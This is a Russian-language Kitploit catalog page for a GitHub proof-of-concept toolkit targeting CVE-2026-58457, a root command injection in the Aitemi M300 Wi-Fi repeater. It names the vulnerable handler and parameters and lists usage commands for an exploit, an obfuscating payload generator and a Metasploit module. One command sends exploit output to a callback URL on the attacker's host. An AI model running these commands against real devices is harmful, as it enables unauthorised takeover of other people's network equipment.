Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-58457 — Инструменты PoC для CVE-2026-58457: неаутентифицированная инъекция команд ОС, приводящая к удаленному root-доступу на Wi-Fi репитере Shenzhen Aitemi M300 (MT02). Включает эксплойт, валидатор, генератор полезной нагрузки и модуль Metasploit. Только для образовательных целей и авторизованного пентеста. | Kitploit
Инструменты/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Фреймворки для эксплойтовБезопасность IoTГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность беспроводных сетейТестирование на ПроникновениеКомандование и Управление
Обучение и Образование
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

Репозиторий
251 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Инструменты PoC для CVE-2026-58457: неаутентифицированная инъекция команд ОС, приводящая к удаленному root-доступу на Wi-Fi репитере Shenzhen Aitemi M300 (MT02). Включает эксплойт, валидатор, генератор полезной нагрузки и модуль Metasploit. Только для образовательных целей и авторизованного пентеста.

Поделиться

CVE-2026-58457 - Неаутентифицированная инъекция команд ОС в Wi-Fi репитере Shenzhen Aitemi M300

[!WARNING] Этот код предоставляется КАК ЕСТЬ только для образовательных и исследовательских целей. Не используйте этот PoC на промышленных системах, общих средах или любых неавторизованных целях.

  • Запуск или размещение этого кода может вызвать обнаружение антивирусом, оповещения мониторинга безопасности или юридические последствия при неправильном использовании.
  • Авторы и владельцы репозитория не несут никакой ответственности за любой ущерб, неправомерное использование или незаконные действия, возникшие в результате использования этого кода.
  • Используйте исключительно в изолированных лабораторных средах с соответствующими разрешениями. Предназначен только для защитных исследований, анализа уязвимостей и тестирования синих команд.

Сводка уязвимости

Неаутентифицированная уязвимость инъекции команд ОС существует в обработчике smacfilter_conf. Параметры GET name, enable и mac передаются без санитизации в вызов , который формирует команды UCI, выполняемые от имени .

sprintf()
root
  • Серьезность: Критическая (CVSS 9.8)
  • Воздействие: Удаленное выполнение команд от root без аутентификации

Включенные инструменты

  • poc.py - Полнофункциональный эксплойт с поддержкой HTTPS, повторными попытками, тайм-аутом и эксфильтрацией через callback.
  • val.py - Безопасный пассивный валидатор уязвимости (использует безвредную команду id).
  • gen.py - Продвинутый генератор полезных нагрузок с несколькими методами обфускации.
  • MITIGATIONS.md - Рекомендуемые меры защиты.
  • Модуль Metasploit - Доступен в каталоге exploit/.

Установка

root@kitploit:~
pip install requests

Быстрое использование

  1. Проверка (Безопасно)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Эксплуатация (Только авторизованное тестирование)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Генерация обфусцированных полезных нагрузок
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Переместите модуль
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# или основной путь MSF: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Перезагрузите все
root@kitploit:~
msfconsole -q -x "reload_all"

Ссылки

  • CVE-2026-58457
  • Консультация VulnCheck
  • Раскрытие на GitHub

Приветствуются звезды и вклад - особенно улучшения обходных путей или дополнительные варианты прошивок.

Скачать инструмент